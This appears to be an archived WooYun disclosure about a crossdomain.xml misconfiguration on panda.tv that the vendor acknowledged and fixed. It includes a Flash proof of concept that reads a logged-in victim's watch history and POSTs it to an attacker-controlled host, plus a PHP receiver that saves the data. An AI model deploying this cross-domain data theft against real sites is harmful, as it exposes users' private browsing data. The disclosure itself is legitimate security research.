乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-23: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-06: 细节向公众公开
http://www.panda.tv/crossdomain.xml 配置不当csrf 可获取敏感信息,通过http://www.panda.tv/watchhistory获取历史记录同时也可获取其他信息PoC:
// Author: Gursev Singh Kalra ([email protected])// XDomainXploit.as// Thanks - http://help.adobe.com/en_US/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b90204-7cfd.html#WS5b3ccc516d4fbf351e63e3d118a9b90204-7cf5package { import flash.display.Sprite; import flash.events.*; import flash.net.URLRequestMethod; import flash.net.URLRequest; import flash.net.URLLoader; public class XDomainXploit extends Sprite { public function XDomainXploit() { // Target URL from where the data is to be retrieved var readFrom:String = "http://www.panda.tv/watchhistory"; var readRequest:URLRequest = new URLRequest(readFrom); var getLoader:URLLoader = new URLLoader(); getLoader.addEventListener(Event.COMPLETE, eventHandler); try { getLoader.load(readRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } private function eventHandler(event:Event):void { // URL to which retrieved data is to be sent var sendTo:String = "http://xxxxxx/baike.php" var sendRequest:URLRequest = new URLRequest(sendTo); sendRequest.method = URLRequestMethod.POST; sendRequest.data = event.target.data; var sendLoader:URLLoader = new URLLoader(); try { sendLoader.load(sendRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } }}
baike.php
<?php$data = file_get_contents("php://input");$ret = file_put_contents('/tmp/panda.html', $data, FILE_APPEND | LOCK_EX);if($ret === false) { die('Error writing to file');}else { echo "$ret bytes written to file";}?>
访问http://xxx.xxx.xxx.xxx/XDomainXploit.swf
crossdomain.xml安全配置
危害等级:低
漏洞Rank:1
确认时间:2015-12-24 14:52
熊猫君已经改进了此问题,感谢白帽子大大的支持!
暂无
